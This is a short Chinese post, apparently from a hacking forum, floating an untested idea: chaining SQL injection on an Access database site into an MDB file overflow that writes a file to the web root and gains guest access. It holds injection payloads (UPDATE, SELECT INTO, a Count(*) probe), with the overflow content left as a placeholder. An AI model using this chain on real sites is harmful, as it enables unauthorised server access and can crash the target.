(此想法暂时未做实验)
对于没有fso没有上传功能的站点是不是有注入也没法通过注入搞定呢.呵呵看了些东西,有个新想法,
而且这个站的路径都爆不出来,很郁闷的.
我们一样可以拿他
1.update tablename set field ="xxx" where id=1;
/*这里xxx很重要,是构造的mdb溢出内容包括ip,端口等*/
2.SELECT * into [test.txt] in 'x:\wwwroot\' 'text;' from tablename where id =1;
3. and (Select Count(*) from [x:\wwwroot\test.txt].anything)>0;
/*注意:溢出成功与否,access全死,服务器狂慢,弄不好挂了*/
4.按理论溢出成功
5.guest已得,进一步提升略!
想了想,生成文件有多余信息,这样难度超高!